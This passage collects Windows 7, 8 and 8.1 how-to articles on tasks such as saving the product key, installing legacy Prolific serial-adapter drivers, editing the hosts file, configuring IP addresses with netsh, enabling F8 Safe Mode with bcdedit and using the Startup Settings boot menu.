windows-8-backup-license-product-key-2Figure 2. Running the script reveals our Product Key

At this point, you can save the displayed information by clicking on the ‘Yes’ button. This will create a text file with the name “Windows Product Key.txt” and save it in the same location from where the script was executed:

windows-8-backup-license-product-key-3Figure 3. Saving your Windows information to a text file

We should note that every time the script is executed and we select to save the information, it will overwrite the contents of the previous text file. This is important in case you decide to update your Windows with a new product key, e.g. moving from Windows 8.1 to Windows 8.1 Professional. In this case it would be advisable to rename the previously produced text file before executing the script and saving its information.
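As a side note, on newer OEM machines where the manufacturer has embedded the product key in the UEFI firmware, you may also be able to read the key directly from an administrative command prompt. This is a hedged alternative rather than a guaranteed method; on systems without a firmware-embedded key the field simply comes back empty:

C:\windows\system32> wmic path softwarelicensingservice get OA3xOriginalProductKey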

This article showed how to reveal and save the Windows Product Key information of your Windows 8 and Windows 8.1 operating system. We also explained the difference between the 20-character Product ID, shown in the System Information window, and the Product Key.


Installing The ‘Unsupported’ Prolific USB-to-Serial Adapter PL-2303HXA & PL-2303X on Windows 8 & 8.1

profilic-pl2303-driver-installation-windows8-1aThanks to the absence of dedicated serial ports on today’s laptops and ultrabooks, USB-to-Serial adapters are very popular amongst Cisco engineers as they are used to perform the initial configuration of a variety of Cisco equipment such as routers, catalyst switches, wireless controllers (WLC), access points and more, via their Console Port. The most common USB-to-Serial adapters in the market are based on Prolific’s PL2303 chipset.

With the arrival of Windows 8, Windows 8.1 and the upcoming Windows 10, Prolific has announced that these operating systems will not support USB-to-Serial adapters using the PL-2303HXA & PL-2303X chipsets, forcing thousands of users to buy USB-to-Serial adapters powered by the newer PL-2303HXD (HX Rev D) or PL2303TA chipset.

The truth is that the PL-2303HXA & PL-2303X chipsets are fully supported under Windows 8 and Windows 8.1, and we’ll show you how to make use of that old USB-to-Serial adapter that might also hold some special sentimental value.

Make sure to download our Prolific Windows 8/8.1 x64bit drivers from our Administrative Tools section.

We took our old USB-to-Serial adapter and plugged it into our ultrabook running Windows 8.1. As expected, the operating system listed the hardware under Device Manager with an exclamation mark:

profilic-pl2303-driver-installation-windows8-1Figure 1. Prolific Adapter in Device Manager

A closer look at the properties of the USB-to-Serial adapter reveals the popular Code 10 error which means that the device fails to start:

profilic-pl2303-driver-installation-windows8-2Figure 2. Prolific Adapter Error Code 10

Getting That Good-old USB-to-Serial Adapter To Work

Assuming you’ve successfully downloaded and unzipped the Prolific Windows 8/8.1 x64bit drivers from our Administrative Tools section, go back to the Device Manager, right-click on the Prolific USB-to-Serial Comm Port entry with the exclamation mark and select Update Driver Software:

profilic-pl2303-driver-installation-windows8-3Figure 3. Updating the Drivers from Device Manager

Next, select Browse my computer for driver software from the next window:

profilic-pl2303-driver-installation-windows8-4Figure 4. Select Browse my computer for driver software

Next, browse to the folder where you’ve unzipped the provided drivers, click on the Include Subfolders option and select Let me pick from a list of device drivers on my computer:

profilic-pl2303-driver-installation-windows8-5Figure 5. Select Let me pick from a list of device drivers on my computer

Next, select the driver version 3.3.2.102 dated 24/09/2008 as shown below and click Next:

profilic-pl2303-driver-installation-windows8-6Figure 6. Install Driver version 3.3.2.102

Once complete, Windows will confirm the successful installation of our driver as shown below:

profilic-pl2303-driver-installation-windows8-7Figure 7. Driver successfully installed

Closing the window, we return back to the Device Manager where we’ll notice the exclamation mark has now disappeared and our old ‘Unsupported’ USB-to-Serial adapter is fully operational:

profilic-pl2303-driver-installation-windows8-8Figure 8. Fully operational USB-to-Serial adapter

This article showed how to successfully install your old USB-to-Serial adapter based on the Prolific PL-2303HXA & PL-2303X chipsets on the Windows 8 and Windows 8.1 operating systems. Despite the fact that Prolific clearly states these chipsets are not supported on the latest Windows versions, forcing users to purchase new adapters powered by its newer chipsets, we’ve proven that this is not true and showed how to make the old Prolific USB-to-Serial adapter work with the drivers available on Firewall.cx.

 

 




How to Enable Master Control Panel or Enable God Mode in Windows 7, 8 & 8.1

Around 2007, an undocumented feature of Windows, called God Mode, was published outside of the documentation provided by Microsoft. This is the Windows Master Control Panel shortcut. Bloggers named it All Tasks or God Mode and it gained popularity as it provided a method of creating a shortcut to various control settings in Windows Vista at the time. Later Windows operating systems such as Windows 7, Windows 8 and Windows 8.1 also carry this feature. The exception is the 64-bit version of Windows Vista, where this functionality is known to crash Explorer.

Although not intended for use by general users, God Mode or Master Control Panel functionality in Windows is implemented by creating a base folder with a special extension. The format used is:

  <FolderDisplayName>.{<GUID>}

Here, GUID represents a valid Class ID or CLSID that has a System.ApplicationName entry in the Windows Registry. Microsoft documents this technique as “Using File System Folders as Junction Points”. FolderDisplayName can be anything; when this technique was discovered, the name GodMode, coined by bloggers, stuck. Among the many GUID shortcuts revealed in Windows, the CLSID {ed7ba470-8e54-465e-825c-99712043e01c} is of special interest as the related widget points to and permits access to several Windows settings or Control Panel applets.

Users can now create a control panel called GodMode that allows them easy access to almost all the administrative tasks in Windows. In fact, GodMode is so named as users have complete access to all aspects of the management of Windows at their fingertips and in one location. That makes it very convenient to configure hardware or Windows settings quickly from a single screen. You access GodMode by creating a special folder on the desktop.

Arrive at the Windows desktop by closing all the open windows. Right-click on an empty part of the desktop or hold your finger there. In the menu that comes up, tap/click on New and then on the Folder option:

windows-enable-master-control-panel-god-mode-1 Figure 1. Creating a New Folder

You will see a new folder appear on the desktop and the title of the folder will be in edit mode. Modify the title of the new folder, or rename it to:

 GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Once renamed, the icon will change as shown below:

windows-enable-master-control-panel-god-mode-2Figure 2. Create a new folder & rename it to reveal GodMode
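If you prefer the command line, the same special folder can be created with a single command from a command prompt opened in your Desktop folder. The path below is a hypothetical example and should reflect your own user profile:

C:\Users\YourName\Desktop> md "GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}"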

 You must double-click/tap on the icon to open the GodMode Screen:

windows-enable-master-control-panel-god-mode-3Figure 3. The GodMode Screen

You can now proceed to tweak Windows using the list of available configuration options presented simply by scrolling through and tapping/clicking the option you want.

If you no longer need to have GodMode in your system, you can safely  delete the GodMode folder on your desktop. 

This article showed how to enable GodMode on Windows Vista (32Bit only), and both 32/64 Bit versions of Windows 7, Windows 8 and Windows 8.1.


The Importance of Windows Hosts File - How to Use Your Hosts File on Windows Workstations and Windows Servers

This article explains how the Windows operating system makes use of the popular hosts file, where it is located on the various operating systems, and how it can be used to manipulate DNS lookups and redirect them to different IP addresses and hosts.

What Is The Domain Name System?

The Internet uses a standard domain name resolution service called the DNS or the Domain Name System. All devices on the Internet have a unique IP address, much like the postal addresses people use. On the Internet, any device wanting to connect to another can do so only by using the IP address of the remote device. To know the remote IP address, the device has first to resolve the remote domain name to its mapped IP address by using DNS.

The device queries the DNS server, usually configured by the local router, by requesting the server for the IP address of that specific remote domain name. In turn, the DNS server may have to query other similar servers on the Internet until it is able to locate the correct information for that domain name. The DNS server then returns the remote IP address to the device. Finally, the device opens a connection directly to the remote IP address to perform the necessary operations.

An Alternative Method – The 'Hosts' File

Querying the DNS server to connect to a remote device can be a time-consuming process. An alternative faster method is to look up the hosts file first. This is like the local address book in your mobile, which you can consult for quickly calling up commonly used telephone numbers. All operating systems use a hosts file to communicate via TCP/IP, which is the standard of communication on the Internet. In the hosts file, you can create a mapping between domain names and their corresponding IP addresses.

You can view the contents of the hosts file in a text editor. Typically, it contains IP addresses and corresponding domain names separated by at least one space, and each entry on its own line. By suitably manipulating the contents of the hosts file, it is very easy to interchange the IP address mappings of Google.com and Yahoo.com, such that when searching for Yahoo your browser will point to Google and vice versa!
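As a simple illustration, a few hosts file entries might look like the following; the IP addresses and host names are hypothetical examples only:

# Format: IP-address   host-name
127.0.0.1       localhost
192.168.10.25   intranet.example.local
192.168.10.25   www.example.local

Lines beginning with # are treated as comments and ignored.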

Most operating systems, including Microsoft Windows, are configured to give preference to the hosts file over the DNS server queries. In fact, if your operating system finds a mapping for a domain name in its hosts file, it will use that IP address directly and not even bother to query the DNS server. Whatever entries you add to your hosts file, they start working immediately and automatically. You will not need to either reboot or enter any additional command to make the operating system start using the entries in the hosts file.

Understanding Domain Name Resolution On Windows

Windows machines may not always have a hosts file, but they will have a sample file named lmhosts.sam. You will find the hosts file and the lmhosts.sam file in the following location on all Windows operating systems, including Server editions:

C:\Windows\System32\drivers\etc\hosts

windows-hosts-file-usage-and-importance-1Figure 1. Hosts & lmhosts.sam files in File Explorer

In case the hosts file is missing, you can copy the lmhosts.sam file to a new file named hosts and use it as you wish after editing it in Notepad.

Getting The Most Out Of Your Hosts File

The Windows hosts file is a great help in testing new machines or deployment servers. You may want to set up and test online servers, but have them resolving only for your workstation. For example, your true web server may have a domain name www.firewall.cx, while you may have named your development server development.firewall.cx.

To connect to the development server from a remote location, you could change www.firewall.cx in your public DNS server to point to development.firewall.cx, or add an additional entry in the public DNS server. The problem with this method is that although you would be able to log into your development server, so would everyone else as the DNS server is publicly accessible.

So, instead of adding or changing resource records on your public DNS server, you can modify the hosts file on the computer that you will be using to connect to the remote development server. Simply add an entry in the hosts file to map development.firewall.cx or even www.firewall.cx to the IP address of your development server. This will let your test bed computer connect to your development server without making the server publicly discoverable via DNS.

Another great usage of the hosts file is to block Spyware and/or Ad Networks. Add all the Spyware sites & Ad Networks domain names to the Windows hosts file and map them to the IP address 127.0.0.1, which will always point back to your machine. That means your browser will be unable to reach these sites or domains. This has a dual benefit: the unwanted content is blocked and pages tend to load faster.

You can download ready-made hosts files that list large numbers of known ad servers, banner sites, sites giving tracking cookies, sites with web bugs and infected sites. You can find such hosts files on the Hosts File Project. Before using one of these files in your computer, it would be advisable to backup the original file first. Although using the downloadable hosts files is highly recommended, one must keep in mind that large hosts files may slow down your system.

Usually, Windows uses a DNS Client service for caching previous DNS requests in memory. Although this is supposed to speed up the process, having to read the entire hosts file into the cache at the same time may cause the computer to slow down. You can easily fix this by stopping and disabling the unnecessary DNS Client service from the Services control panel under the Administrative Tools.
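The same can be done from an administrative command prompt; a brief example using the service's short name, Dnscache:

C:\> net stop dnscache
C:\> sc config dnscache start= disabled

The first command stops the running service, while the second prevents it from starting at the next boot (the space after start= is required by sc).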

Conclusion

The Windows hosts file can be found on all Windows operating systems, including Server editions. If used with care, the Windows hosts file can be a powerful tool. It can make your computer environment much safer by helping to block malicious websites, while at the same time potentially increasing your browsing speed.

 


How To Change & Configure An IP Address or Set to DHCP, Using The Command Prompt In Windows 7

Not many users are aware that Windows 7 provides more than one way to configure a workstation’s network adaptor IP address or force it to obtain an IP address from a DHCP server. While the most popular method is configuring the properties of your network adaptor via the Network and Sharing Center, the less popular and largely unknown way is using the netsh command from the Command Prompt. In this tutorial, we show you how to use the netsh command to quickly and easily configure your IP address or set it to DHCP. Competent users can also create simple batch files (.bat) for each network (e.g. home, work, etc.) so they can execute them to quickly make the IP address, Gateway IP and DNS changes; an example batch file is shown later in this article.

In order to successfully change the IP address via Command Prompt, Windows 7 requires the user to have administrative rights. This means even if you are not the administrator, you must know the administrative password, since you will be required to use the administrative command prompt.

Opening The Administrative Command Prompt On Windows 7

To open the administrative command prompt in Windows 7, first click on the Start icon. In the search dialog box that appears, type cmd and right-click on the cmd search result displayed. On the menu that Windows brings up, click on the Run as administrator option as shown in the below screenshot:

windows-7-change-ip-address-via-cmd-prompt-1Figure 1. Running CMD as Administrator

Depending on your User Account Control Settings (UAC), Windows may ask for confirmation. If this happens, simply click on Yes and Windows will present the CLI prompt running in elevated administrator privileged mode:

windows-7-change-ip-address-via-cmd-prompt-2Figure 2.  The Administrative Command Prompt Windows 7

Using The ‘netsh’ Command Prompt To Change The IP Address, Gateway IP & DNS

At the Administrative Command Prompt, type netsh interface ip show config, which will display the network adapters available on your system and their names. Note down the name of the network adaptor for which you would like to set the static IP address.

windows-7-change-ip-address-via-cmd-prompt-3Figure 3.  Finding Our Network Adapter ID

In our example, we’ll be modifying the IP address of the interface named Wireless Network Connection, which is our laptop’s wireless network card.

Even if the Wireless Network Connection is set to be configured via DHCP, we can still configure a static IP address. Following is the command used to configure the interface with the IP address of 192.168.5.50 with a subnet mask of 255.255.255.0 and finally a Gateway of 192.168.5.1:

C:\Windows\system32> netsh interface ip set address "Wireless Network Connection" static 192.168.5.50 255.255.255.0 192.168.5.1

Next, we configure our primary DNS server using the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip set dnsserver "Wireless Network Connection" static 8.8.8.8

Note: When entering a DNS server, Windows will try to query the DNS server to validate it. If for any reason the DNS server is not reachable (therefore not validated), you might see the following error:

The configured DNS server is incorrect or does not exist

To configure the DNS server without requiring DNS Validation, use the validate=no parameter at the end of the command:

C:\Windows\system32> netsh interface ip set dnsserver "Wireless Network Connection" static 8.8.8.8 validate=no

This command forces the DNS server setting without any validation and therefore no error will be presented at the CLI output in case the DNS server is not reachable.

To verify our new settings, use the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip show config

At this point, we should see the network settings we configured, as shown below:

windows-7-change-ip-address-via-cmd-prompt-4Figure 4. Verifying Our New Network Settings
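As mentioned in the introduction, the commands above can be saved into simple batch files, one per network, and executed from an administrative command prompt whenever you switch locations. The sketch below reuses the exact commands from this article; the adapter name, addresses and file names are examples and should be adjusted to your own networks:

rem home.bat - static IP settings for the home network
netsh interface ip set address "Wireless Network Connection" static 192.168.5.50 255.255.255.0 192.168.5.1
netsh interface ip set dnsserver "Wireless Network Connection" static 8.8.8.8 validate=no

rem work.bat - hand the same adapter back to DHCP
netsh interface ip set address "Wireless Network Connection" dhcp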

Using The 'netsh' Command Prompt To Set The Network Interface Card To DHCP

You can also use the netsh command to switch your network adaptor from a static IP configuration back to DHCP. To do so, use the following command:

C:\Windows\system32> netsh interface ip set address "Wireless Network Connection" dhcp

Windows will not return any confirmation after the command is entered; however, if the network adaptor has successfully obtained an IP address and has an Internet connection, there should not be a network icon with an exclamation mark in the taskbar notification area, as shown below:

windows-7-change-ip-address-via-cmd-prompt-5Figure 5.  Wireless Icon with no Exclamation Mark

Finally, to verify that DHCP is enabled and we’ve obtained an IP address, use the netsh command with the following parameters:

C:\Windows\system32> netsh interface ip show config

This article showed how to configure a Windows 7 network interface with an IP address, Gateway and DNS server, using the Administrative Command Prompt. We also showed how to set a Windows 7 network interface to obtain an IP address automatically from a DHCP server.




How to View Hidden Files and Folders In Windows 8 & 8.1

windows-8-how-to-show-hidden-folders-files-1aWindows 8 & 8.1 hides two types of files so that normally you do not see them while exploring your computer. The first type is files or folders with their 'H' attribute set to make them hidden. The other type is Windows system files. The reason behind hiding these files is that users could inadvertently tamper with them or even delete them, causing the operations of Windows 8/8.1 to fail. This article explains how you can configure Windows 8 or 8.1 to show all hidden files and folders, plus show Windows system files.
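For reference, the 'H' attribute mentioned above can also be inspected or set from a command prompt. A brief example; the paths and file name below are hypothetical:

C:\Users\YourName> dir /a:h
C:\Users\YourName> attrib +h "C:\Users\YourName\Documents\private.txt"

The first command lists hidden files in the current folder, while the second marks a file as hidden (attrib -h reverses it).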

You can change the behavior of your Windows 8/8.1 computer to show hidden files by changing the settings in the Folder Options screen. There are two primary ways you can reach the Folder Options screen. Both are analysed below:

Windows 7 users can also refer to our How to View Hidden Files and Folders In Windows 7 article

Method 1: Making Hidden & System Files Visible From Windows Explorer

Begin from the Start Screen by closing down all open applications.

Step 1: Tap/click on the Desktop tile to bring up the Windows Desktop.

Step 2: Tap/click on the Files Explorer icon in the Panel at the bottom left hand side of your Desktop:

windows-8-how-to-show-hidden-folders-files-1Figure 1. Icons in the Windows Panel

When the Explorer window opens, expand the Ribbon by pressing the keys Ctrl+F1 together, or by tapping/clicking on the Down-Arrow at the top right hand corner of the window panel. Next, tap/click on the View tab and then on the Local Disk (C:) option. Tap/click on Large Icons option in the ribbon to see the folders.

Within the ribbon, if you tap/click to place a check mark in the checkbox against the Hidden items options, all hidden folders and files will become visible and will show up with semi-transparent icons:

windows-8-how-to-show-hidden-folders-files-2Figure 2. File Explorer showing hidden folders and files

Method 2: Making Hidden & System Files Visible From The Folder Options

Starting from any screen, swipe in from the right hand edge or tap/click on the bottom right hand corner of the screen to bring up the Charms:

windows-8-how-to-show-hidden-folders-files-3Figure 3. Windows Charms

Tap/click on the Search icon and type “Control” within the resulting dialog box. Within the search results displayed, you will find Control Panel; tap/click on this to bring up the Control Panel:

windows-8-how-to-show-hidden-folders-files-4Figure 4. Control Panel

Tap/click on the Appearance and Personalization link, which will open up the Appearance and Personalization screen.

Next, Tap/click on the Folder Options link or the Show hidden files and folders link to bring up the Folders Option screen:

windows-8-how-to-show-hidden-folders-files-5Figure 5. Control Panel - Folder Options

Another way to reach the Folder Options is from File Explorer. In the View tab, tap/click on Options (ribbon expanded) to get a link for Change folder and search options. Tap/click on the Change folder and search options link to open up the Folder Options window.

Click on either Folder Options or Show hidden files and folders to reach the Folder Options screen as shown below:

windows-8-how-to-show-hidden-folders-files-6 Figure 6. Folder Options Screen

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click on the radio button under it labeled as Show hidden files, folders and drives. This will change all the invisible hidden and system files and folders and make them visible.

It is important to see the file extension to know a file type - normally, Windows keeps this hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and remove the checkmark against it.

As mentioned in the beginning of our article, Windows hides files belonging to the operating system. To make these visible, click and uncheck the label Hide protected operating system files (Recommended). At this time, Windows will warn you about displaying protected system files and ask you whether you are sure about displaying them – Click on the Yes button.

To make the changes effective, click on the Apply button and subsequently on the OK button. All screens will close and you will be back to your Desktop

The folders with the semi-transparent icons are the hidden folders, while those with fully opaque icons are the regular ones.

If you do not want Windows 8/8.1 to show hidden files and folders, follow the reverse procedure above in the Folder Options screen.


How to View Hidden Files & Folders in Windows 7

windows-7-showing-hidden-files-1This article shows you how to see hidden files and folders in Windows 7. Windows 7 hides important system files so that normally, you do not see them while exploring your computer.

The reason behind hiding these files is that users could inadvertently tamper with them or even delete them, causing Windows 7 operations to falter. However, malicious software programs take advantage of this feature to create hidden files or folders and cause disruptions in the computer's operations without the user being able to detect them.

Therefore, being able to see hidden files or folders has its advantages and helps in repairing damages caused by unwanted hidden files. You can change the behavior of your Windows 7 computer to show hidden files by changing the settings in the Folder Options screen. There are two primary ways you can reach the Folder Options screen. Start by closing down all open applications.

Windows 8 and 8.1 users can also refer to our How to View Hidden Files and Folders In Windows 8 & 8.1 article

Method 1: Reaching The Folder Options Screen From Windows Explorer

Click on the Windows Explorer icon in the TaskBar at the bottom left hand side of your Desktop:

windows-7-showing-hidden-files-2Figure 1. Icons in the Windows Panel

When the Explorer window opens, you have to click on the Organize button to display a drop down menu:

windows-7-showing-hidden-files-3Figure 2. Organize Menu

Next, click on Folder and search options and the Folder Options screen opens up:

windows-7-showing-hidden-files-6Figure 3. Show hidden files, folders and drives & Hide extensions for known file types

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click the radio button underneath it labeled Show hidden files, folders and drives. This will make all invisible files and folders visible.

Seeing the file extension is important for identifying a file's type, but Windows normally keeps extensions hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and click to remove the checkmark against it as shown in the above screenshot. This will force Windows to show the extensions of all files.

When ready, click on the Apply and OK button to save the changes.

Method 2: Reaching The Folder Options Screen From The Control Panel

Click on the Start icon in the Panel at the bottom left hand side of your Desktop – see figure 4 below. In the resulting Start menu, you must click on the Control Panel option.

windows-7-showing-hidden-files-4Figure 4. Start Menu

This opens up the Control Panel screen, which allows you to control your computer's settings. Click on the Appearance and Personalization link to open up the Appearance and Personalization screen.

windows-7-showing-hidden-files-5Figure 5. Appearance and Personalization screen

Click on either Folder Options or Show hidden files and folders on the left window, to reach the Folder Options screen.

There are other ways as well to reach the Folder Options screen.

windows-7-showing-hidden-files-6Figure 6. Show hidden files, folders and drives & Hide extensions for known file types

In the Folder Options screen, click on the View tab, go to the Hidden files and folders option and click the radio button underneath it labeled Show hidden files, folders and drives. This will make all invisible files and folders visible.

Seeing the file extension is important for identifying a file's type, but Windows normally keeps extensions hidden. While still in the Folder Options screen, go to the label Hide extensions for known file types and click to remove the checkmark against it as shown in the above screenshot. This will force Windows to show the extensions of all files.

Windows also hides files belonging to the operating system. To make these visible, click and uncheck the label Hide protected operating system files (Recommended). At this time, Windows will warn you about displaying protected system files and ask you whether you are sure about displaying them – Click on the Yes button.

When ready, click on the Apply and OK button to save the changes.

Windows Now Shows Hidden Files & Folders

When we next browse through C: Drive, we'll notice that there are now additional folders and files which were previously hidden:

windows-7-showing-hidden-files-7Figure 7. C: Drive showing hidden folders

The folders with the semi-transparent icons are the hidden folders, while those with fully opaque icons are the regular ones.

If you do not want Windows 7 to show hidden files and folders, follow the reverse procedure executed in the Folder Options screen.


How to Start Windows 8 and 8.1 in Safe Mode – Enabling F8 Safe Mode

This article will show you how to start Windows 8 and Windows 8.1 in Safe Mode and how to enable F8 Safe Mode. Users of previous Windows operating systems will recall that by pressing and holding the F8 key while Windows is booting (before the Windows logo appears), the system would present a special menu allowing the user to direct the operating system to enter Safe Mode.

When Windows boots, the Safe Mode logo appears on all four corners of the screen:

windows-8-enable-f8-safe-mode-1Figure 1. Windows 8/8.1 in Safe Mode

Occasionally, Windows will not allow you to delete a file or uninstall a program. This may be due to several reasons, such as a virus, a malware infection, or a driver/application compatibility issue. Windows may also face hardware driver problems that you are unable to diagnose in the normal process. Traditionally, Windows provides a Safe Mode to handle such situations. When in Safe Mode, only the most basic drivers and programs that allow Windows to start are loaded.

Unlike all other Windows operating systems, Windows 8 and 8.1 do not allow entering Safe Mode via the F8 key by default. If you are unable to boot into Windows 8 or 8.1 after several attempts, the operating system automatically loads the Advanced Startup Options, which allow you to access Safe Mode.

For users who need to force their system to boot into Safe Mode, there are two methods to enter the Advanced Startup Settings that will allow Windows to boot into Safe Mode.

Method 1 - Accessing Safe Mode In Windows 8 / Windows 8.1

Accessing Safe Mode involves a number of steps and actions required by the user. These are covered in great depth in our How to Enable & Use Windows 8 Startup Settings Boot Menu article.

Method 2 - Enabling Windows Safe Mode Using F8 Key At Boot Time

If you find accessing Windows 8 Safe Mode too long and complex, you can alternatively enable the F8 key for booting into Safe Mode, just as it happens with the older Windows operating systems. This of course comes at the expense of slower booting since the operating system won't boot directly into normal mode.

Interestingly enough, users who choose to enable F8, can also access the diagnostic tools within the Safe Mode quickly at any time. Additionally, if you have multiple operating systems on your computer, enabling the F8 option makes it easier to select the required operating system when you start your computer.

Enabling the F8 key in Windows 8/8.1 is only possible with administrative permissions. For this, you will need to open an elevated command prompt. The easiest way to open the elevated command prompt window is by using the Windows and X key combination on your keyboard:

windows-8-enable-f8-safe-mode-2Figure 2. Windows Key +X

The Windows Key + X combination opens up the Power User Tasks Menu from which you can tap/click the Command Prompt (Admin) option:

windows-8-enable-f8-safe-mode-3Figure 3. Power User Tasks Menu

Should you receive a prompt from User Account Control (UAC) requesting confirmation, simply allow the action and the command prompt will appear.

At the command prompt type in the following command and then press the Enter key:

C:\Windows\System32> bcdedit /set {default} bootmenupolicy legacy

windows-8-enable-f8-safe-mode-4 Figure 4. Administrative Command Prompt - Enable F8 Boot Function

On successful execution, Windows will acknowledge - The operation completed successfully.

Now, for the changes to take effect, you must reboot Windows. If you press the F8 key during Windows boot, you should be able to access Safe Mode and all other Advanced Boot Options.
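
If you would like to confirm the change before rebooting, you can list the default boot entry and check that the bootmenupolicy value now reads Legacy; a quick, hedged check (the exact output varies per system):

C:\Windows\System32> bcdedit /enum {default}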

If for any reason, you want to disable the F8 option, open the Administrative Command Prompt, enter the following command and then press the Enter key:

C:\Windows\System32> bcdedit /set {default} bootmenupolicy standard

 windows-8-enable-f8-safe-mode-5Figure 5. Administrative Command Prompt - Disable F8 Boot Function

Again, Windows will acknowledge - The operation completed successfully. The changes will take place on the next reboot and the F8 key will no longer boot Windows into Safe Mode.

This article explained how to successfully start Windows 8 and Windows 8.1 in Safe Mode. We also saw how to enable the F8 Safe Mode function, which is disabled by default.

Visit our Windows 8/8.1 section to read more hot topics on the Windows 8 operating system.

 


How to Enable & Use Windows 8 Startup Settings Boot Menu (Workstations, Tablet & Touch Devices)

The Windows 8 Startup Settings Boot Menu allows users to change the way Windows 8 starts up. This provides users with the ability to enable Safe Mode with or without Command Prompt, enable Boot Logging, enable Debugging and much more. Access to the Startup Settings Boot Menu is provided through the Advanced Startup Options Menu as described in detail below. Alternatively, users can use the following command in the Run prompt to restart and boot directly into the Advanced Startup Options Menu:

shutdown /r /o /t 0

While not enabled by default, the F8 key can also be used to enter Safe Mode when booting into the operating system, just as with all previous Windows versions. To learn more on this, read our How to Start Windows 8 and 8.1 in Safe Mode – Enabling F8 Safe Mode article.

Enabling the Windows 8 Startup Settings Boot Menu via GUI

Start with the Windows 8 Start screen. Type the word advanced directly, which will bring up the items you can search. You may also slide in from the right edge, tap/click on the Search icon and type advanced into the resulting dialog box. Within the search items listed, tap/click on Settings:

windows8-startup-settings-boot-menu-1Figure 1. Search Settings

 Windows will now show you the Advanced Startup Options within a dialog box as shown below:

windows8-startup-settings-boot-menu-2Figure 2. Advanced Settings Search Result

 Tapping or clicking within the dialog box will take you to the PC Settings screen. Tap/click on the General Button and scroll down the menu on the right hand side until you come to Advanced Startup. Directly underneath is the Restart Now button:

windows8-startup-settings-boot-menu-3Figure 3. PC Settings

 Tapping/clicking on the Restart Now button will let Windows offer its Options screen:

windows8-startup-settings-boot-menu-4Figure 4. Choose Options

 On the Options screen, tap/click on the Troubleshoot button to bring up the Troubleshoot menu:

windows8-startup-settings-boot-menu-5Figure 5. Troubleshoot Menu

 From here tap/click on the Advanced Options button to get to the Advanced Options menu:

windows8-startup-settings-boot-menu-6Figure 6. Advanced Options Menu

From the Advanced Options Menu, tap/click on the Startup Settings button. This brings you to the Startup Settings screen showing the various startup settings of Windows 8 that you will be able to change when you Restart. To move ahead, tap/click on the Restart button on the lower right corner of the screen:

windows8-startup-settings-boot-menu-7Figure 7. Startup Settings Screen

 Windows 8 will now reboot, taking you directly into the Startup Settings Boot Menu. Your mouse pointer will not work here and you must type the number key (or the function key) corresponding to your selection. If you wish to see more options, you can do so by pressing the F10 key:

windows8-startup-settings-boot-menu-8Figure 8. Startup Settings Boot Menu

To return without making any changes, hit the Enter key on your keyboard; you will need to login once again.

The menu options presented are analysed in detail below.

Windows 8 Startup Settings Boot Menu

The Windows 8 Startup Settings Boot Menu lists all the options from which you can select one to alter the way Windows will boot up next. You must be careful here, as there is no way you can go back on your selection and Windows will directly proceed to boot with the selected option. Each option results in a different functionality, as discussed below:

  • Enable Debugging – Useful only if you have a kernel debugger connected to your computer and you want it to control system execution. This option is usually used by advanced Windows users.
  • Enable boot logging – Useful if you want to know what is happening during boot time. This option forces Windows to create a log file at C:\Windows\Ntbtlog.txt, where you will find detailed information about the boot process. For example, if there is a problem with the starting of a specific driver, you will find the relevant information in the log file (a quick way to inspect this log is shown after this list). Normally used by intermediate to advanced users.
  • Enable low-resolution video – Useful if you are facing trouble with your video graphics card and you are unable to see Windows properly. This option will let Windows start up in a low-resolution mode, from where you can specify the proper video resolution that Windows can use.
  • Enable Safe Mode – Useful if you want Windows to bypass the normal video card driver and use the generic VGA.sys driver instead. With this option, Windows will start up in a bare-bones mode and will load only the programs that are strictly necessary for it to work. Network support is disabled in this mode, so do not expect to connect to the Internet or local network.
  • Enable Safe Mode with Networking – This mode offers similar abilities as the previous Enable Safe Mode (Option 4) and provides additional network support, allowing connectivity to the local network or Internet.
  • Enable Safe Mode with Command Prompt – Useful when you want Windows online but with only a command prompt to type in commands, rather than the usual Windows GUI desktop. In this mode, Windows will only load the bare necessary programs to allow it to run. In place of the normal video card driver, Windows will operate the VGA.sys driver. However, do not confuse this mode with the Windows 8 Recovery Environment Command Prompt, where Windows operates offline.
  • Disable driver signature enforcement – Useful for loading unsigned drivers requiring kernel privileges. Typically, Windows does not allow drivers requiring kernel privileges to load unless it can verify the digital signature of the company that developed the driver. This option must be used very carefully, as you are setting aside the security checks that normally prevent malicious drivers from sneaking into your computer.
  • Disable early launch anti-malware protection – Useful to prevent driver conflicts that are preventing Windows from starting. A new feature in Windows 8 allows a certified anti-virus to load its drivers before Windows can load any other third-party driver. Therefore, the anti-virus software is available to scan all drivers before they are loaded. If the anti-virus program detects any malware, it blocks that driver. Since this is a great security feature, disable it only when necessary and apply extreme caution.
  • Disable automatic restart after failure – Useful when you want to see the crash information because Windows restarts too quickly after a crash making it impossible to read the information. Usually, after a crash, Windows displays an error message before automatically rebooting. You may not be able to read the information displayed if Windows reboots very quickly. This option prevents Windows from rebooting after a crash, allowing you to read the error message and take appropriate action.
  • Launch Recovery Environment – Useful for accessing recovery and diagnostic tools. This option is available when you press F10 in the Startup Settings Boot Menu. These options are available under Advanced Options Menu - see Figure 6.
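
As mentioned in the Enable boot logging option above, once boot logging has been enabled and the system rebooted, the resulting log can be inspected from any command prompt; a minimal, hedged example (the exact wording of the log entries may differ between Windows versions):

C:\> notepad C:\Windows\Ntbtlog.txt
C:\> findstr /i /c:"did not load" C:\Windows\Ntbtlog.txt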

This article covered how to enable and use the Startup Settings Boot Menu in Windows 8 and also explained each of its options in detail. Readers interested in learning how to enable F8 Safe Mode functionality can read the article by clicking here.


How to Join a Windows 8, 8.1 Client to Windows Domain - Active Directory

In this article, we will show how to add a Windows 8 or Windows 8.1 client to a Windows Domain / Active Directory. The article can be considered an extension of our Windows 2012 Server article covering Active Directory & Domain Controller installation.

Our client workstation, FW-CL1, needs to join the Firewall.local domain. FW-CL1 is already installed with the Windows 8.1 operating system and configured with IP address 192.168.1.10 and DNS server 192.168.1.1, which is the domain controller. It is important that any workstation needing to join a domain has its DNS server set to the Domain Controller's IP address, to ensure proper DNS resolution of the domain:

windows-8-join-active-directory-1Figure 1. FW-CL1 IPconfig
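
Before attempting the join, it is also worth confirming that the workstation can resolve the domain name through the domain controller; a quick, hedged check from a command prompt, using our lab's domain name:

C:\> nslookup firewall.local

The reply should come from the domain controller (192.168.1.1) and return its IP address for the domain.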

